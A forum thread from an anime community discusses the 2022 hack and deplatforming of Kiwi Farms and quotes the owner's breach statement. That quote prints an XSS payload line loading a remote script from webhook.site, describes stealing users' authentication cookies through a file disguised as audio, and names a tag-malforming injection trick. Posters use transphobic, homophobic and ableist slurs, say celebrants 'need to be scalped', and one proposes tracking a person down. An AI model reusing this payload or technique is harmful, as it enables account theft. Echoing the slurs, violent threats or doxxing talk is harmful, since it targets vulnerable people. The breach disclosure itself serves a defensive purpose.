• If you're here for vtubers, I highly recommend you go to The Virtual Asylum instead.
    They'll love you there

KiwiFarms gets thrown under the bus by Rep. Marjorie Taylor Greene inadvertently providing cover for Keffals

Thread Description
Army of drooling imbeciles attack Free Speech Forum because people there said mean things about Keffals

Torment

varishangout.com
Regular
unknown-56.png
 

The Decimator

varishangout.com
Site hacked, tor down and now the troon mafia is attacking any other means null has to fight back yet the fucking lemming retard masses cheer in favor of all of this, supporting the fag who wants to convince your 6 YEAR OLD SON to cut off his dick, grow tits, put on panties and dance in front of middle aged guys in speedos. I already had a negative opinion of 99% of humanity but this cements that'll never change.
Those evil fucking parasites just don’t know when to stop.
 

Nehir

varishangout.com
Site hacked, tor down and now the troon mafia is attacking any other means null has to fight back yet the fucking lemming retard masses cheer in favor of all of this, supporting the fag who wants to convince your 6 YEAR OLD SON to cut off his dick, grow tits, put on panties and dance in front of middle aged guys in speedos. I already had a negative opinion of 99% of humanity but this cements that'll never change.
Hacked? Did they change what it says or delete threads? Do you have a screencap?
 

YakuInTheFlesh

varishangout.com
Regular
literally just go to kiwifarms.net
josh explained everything there
I highly recommend this. The little privacy advice he gives is pretty solid and should be taken seriously if you value privacy. Added to that I would also recommend to check out https://www.privacytools.io/

Some excerpts that I think are the most interesting:
The forum was hacked. You should assume the following.

  • Assume your password for the Kiwi Farms has been stolen.
  • Assume your email has been leaked.
  • Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.
Use an email address from a reputable provider. Never use the same password. Use a passphrase with a password manager
Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.
Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.
XenForo provides a way to export user lists with information that is precisely: email, username, last acitivity, register date, user state (banned/unverified), post count
The script was uploaded to XenForo directly (as XenForo does not validate media),
XenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.

Anyone who is in favor of this happening has lost their mind and doesn't understand what this means. In the worst case scenario this was a paid actor and the information could've been used for a mass doxxing of KiwiFarms users. But of course the people who stand proud against the "evil KiwiFarmers that dox everybody" would never do that...
As mentioned in the beginning of the post. Up your privacy! At the very least use more than one E-Mail and Password for everything.
 

Insane Nerd Ramblings

varishangout.com
If Null hadn't proven to be an utterly useless fagaloon on Poast, I would have been willing to forgive the BS. But he simply claimed it was a handful of bad actors (Jack Awful and the like) before going "kys pedo", proving that it wasn't just "a few bad actors". His group of shit-brained slacktivists like "I hope they post CSEM" Procrastinhater can burn for all I care.
 

Nehir

varishangout.com
If Null hadn't proven to be an utterly useless fagaloon on Poast, I would have been willing to forgive the BS. But he simply claimed it was a handful of bad actors (Jack Awful and the like) before going "kys pedo", proving that it wasn't just "a few bad actors". His group of shit-brained slacktivists like "I hope they post CSEM" Procrastinhater can burn for all I care.
Did he stop using poast?
 

Nehir

varishangout.com
literally just go to kiwifarms.net
josh explained everything there
I clicked too late to see the letter. It's only an animated video when I found this post. I didn't know it ever changed from the teacup thing. Okay it looks like the clearnet domain is up rn.
 

YakuInTheFlesh

varishangout.com
Regular
I clicked too late to see the letter. It's only an animated video when I found this post. I didn't know it ever changed from the teacup thing. Okay it looks like the clearnet domain is up rn.
Heres the text that was posted if you want it:
Site Breach
User Impact Statement
The forum was hacked. You should assume the following.

Assume your password for the Kiwi Farms has been stolen.
Assume your email has been leaked.
Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.
Thankfully, most users pay attention to my privacy checkups and there isn't much to leak.
You should take a moment to read privacyguides.org, even if you hate this site. Use an email address from a reputable provider. Never use the same password. Use a passphrase with a password manager suggested on PrivacyGuides. Use email aliases instead of burner emails so you keep access to your accounts without risking your privacy.

I do not know for sure if any user information was leaked. In my access logs, they attempted to download all user records at once. This caused an error and no output was returned. I shut everything off soon after. If they scraped information through some other mechanism, I cannot say with any confidence either way.

Prognosis
The site will be restored from a backup point taken at September 17th at Noon GMT.

This will not happen immediately. I need to reformat and reinstall everything. I need to completely evaluate my security from the top down.

Cloudflare not only provided DDoS protection, they also accounted for many popular exploits like this. As I've worked for weeks to combat the endless flow of attacks from every conceivable angle I have spread myself very thin and hurridly replaced old systems with new ones that are not properly vetted.

Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.

I am very, very tired of writing statements like this, but I find it difficult the stifle my righteous indignation. Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.

More than anything, I really miss spending time with you guys and laughing at stupid shit. It is very draining to deal with such miserable people all the time.

Technical Explanation
Yesterday, vsys - one of our hosts out of Ukraine - was compromised. I initially believed that this allowed a hacker to take over that webserver and snoop data as a man-in-the-middle. I no longer believe that is the case.

A bad actor was able to upload a webpage disguised as an audio file to XenForo. Elsewhere, he was able to load this webpage (probably as an inline frame), causing random users to make automated requests and send their authentication cookies off-site, so that the attacker could use it to gain access to their account. My admin account was compromised through this mechanism.

Once they had access to the ACP, they attempted to download user data, and XenForo provides a way to export user lists with information that is precisely: email, username, last acitivity, register date, user state (banned/unverified), post count, and if they are staff.

However, their request did not appear to go through because they requested too many records at once. The following record reports a 500 error and no content.

2a03:e600:100::31 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://kiwifarms.st/admin.php?users/list" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
It's impossible to say if they acquired user data through other means, but I did not see any other attempt to complete this transaction or otherwise scrape user data.
The file uploaded was an .opus file that contained a web document that looked like this.

<!DOCTYPE html>
<script src=//webhook.site/payload-url></script>
I do not know what was in the payload. The webhook site allows for you to redirect to other scripts and to delete request history, which was done. There's no information tied to that page.
The script caused the user to load /test-chat, my chat shim, /help/, XenForo's help documentation, /avatar/avatar, to change their avatar to the logo of another site (likely as a frame job), and admin.php?tools/phpinfo, if they were an admin.

The script was uploaded to XenForo directly (as XenForo does not validate media), but injected by my custom Rust-based chat program that interacts with XenForo and borrows sessions.

x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/xxxx/xxxx.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
You can find relevant scripts below.
XenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.

The sophistication in this attack is very high, and shows an intimiate familiarity with both Rust and XenForo. It is unfortunate that they have applied themselves to this end, likely for pay.

There are so many more people trying to destroy than create.

Take it easy,
Josh
<[email protected]>

P.S. I am still expecting to have to deal with that family emergency. If that happens, I will be gone for a while. Updates will be on t.me/s/kiwifarms.

Update Sep-19: XSS Injection Found
There were two possible ways to inject an inframe into the chat html, one by using
Code:
 tags, and another by malforming an opening tag, like [b<tag>].

Thank you to the three anonymous people who submitted this information.
[/QUOTE]
 

Insane Nerd Ramblings

varishangout.com
It is very draining to deal with such miserable people all the time.
If that isn't the pot calling the kettle black, I'll eat my fucking hat. This is why Null lost my respect, letting his goddamn moronic tards get away with their BS, claiming "it was only a few bad actors" and then proceeding to prove it wasn't just "a few bad actors". The fact this shirtbird cares more about malding and seething over drawings than actual fucking kiddie diddlers told me everything I needed to know about them.
 

ジエントP

varishangout.com
It's incredibly depressing to see what's happening to KF rn.
Their .ru domain even got pulled, which is absolutely insane.
DDoS-Guard dropped them last I checked. The fucking guys who'll host hamas, have dropped KFs.

This isn't the end of it (I hope), and I'm sure people will move on as they do with the 24 Hour news cycle, and hopefully KiwiFarms will regain some of their security and infrastructure. Josh has made it through before and I'm sure he'll come through again.

You can find Josh's statement here (TOR link).

Lets hope this isn't the last we hear from KF.
Even if you don't like what KF does, it's users, or what they talk about, if you don't see what a horrifying signal this is for the future of the internet you're a fucking retard.
Anyone celebrating what happened to them needs to be scalped.
Considering the fact that they like to stir up crap everywhere even to those who'll take them in I wouldn't be surprised if they tried to make enemies with DDOS-guard as well. Not to take anything bad from the good they do do but they simply are not most amicable people and like to stir up drama to their allies to say it lightly.
 

Scornful Gaze

varishangout.com
Regular
Patron of the Forums
Site is back up on the clearnet at the .net domain again. As usual, backup what you need while you can.

I guess this also counts as a cultural exchange thread.
 

Nehir

varishangout.com
If that isn't the pot calling the kettle black, I'll eat my fucking hat. This is why Null lost my respect, letting his goddamn moronic tards get away with their BS, claiming "it was only a few bad actors" and then proceeding to prove it wasn't just "a few bad actors". The fact this shirtbird cares more about malding and seething over drawings than actual fucking kiddie diddlers told me everything I needed to know about them.
There used to be a really good null thread on a kiwi farms splinter site called lolcow dot org and he was really into neko shota when he was younger apparently.
 

grapedApe

varishangout.com
Regular
Anyone know the other dox site that lucas apparantly doesn't want anyone to know about, would be a shame if we tracked his dumbass.
 

Hexasheep93

varishangout.com
Regular
Is varshhangout pro kiwi farms?
On principle. Varis is pro-freedom of speech and expression whether is controversial art like loli or unpopular opinions like those found on the kiwifarms so on that aspect most of us are not happy with the censorship of the farms.

On a personal level, it varies, some like them for standing against the mainstream ideologies.
While others, me included admittedly, dislike them for their, frankly miopic view on anime.
 

Mr. Suave

varishangout.com
On principle. Varis is pro-freedom of speech and expression whether is controversial art like loli or unpopular opinions like those found on the kiwifarms so on that aspect most of us are not happy with the censorship of the farms.

On a personal level, it varies, some like them for standing against the mainstream ideologies.
While others, me included admittedly, dislike them for their, frankly miopic view on anime.
Well I guess I should make my center left political views known then. Is there a way to post a bio on my profile. I'm still relatively new.

For the record, I think kiwi farms was a cess pool of retarded, freakish alt-right incels who's cancerous activities were nothing short of terrorism. And I highly praise Keffals for her successful campaign in shutting down there freakish site. I came here to engage with weebs, lolicons and social outcasts. Not far right cyber bullies. Hopefully those aren't the kind of people that lark here.
 

Narmy

varishangout.com
Regular
Well I guess I should make my center left political views known then. Is there a way to post a bio on my profile. I'm still relatively new.

For the record, I think kiwi farms was a cess pool of retarded, freakish alt-right incels who's cancerous activities were nothing short of terrorism. And I highly praise Keffals for her successful campaign in shutting down there freakish site. I came here to engage with weebs, lolicons and social outcasts. Not far right cyber bullies. Hopefully those aren't the kind of people that lark here.
If you like lolis then you should be in favor of free speech, even for people you disagree with. Otherwise you can't complain when it is you on the receiving end of censorship.
 

Cursed

varishangout.com
Regular
If you like lolis then you should be in favor of free speech, even for people you disagree with. Otherwise you can't complain when it is you on the receiving end of censorship.
i follow a logic : if they can censor someone , 1 day they can do that at me event what i say/did is still legal.
fight for the freedom of everyone , because censorship is dangerous idea and in reality he create a worst situation , for me the censor of kiwifarm create a worst situation for keffals and radicalize people who as already very insane.
only dialogue/education work is why democracy is actually the best system.
 
Last edited:
Top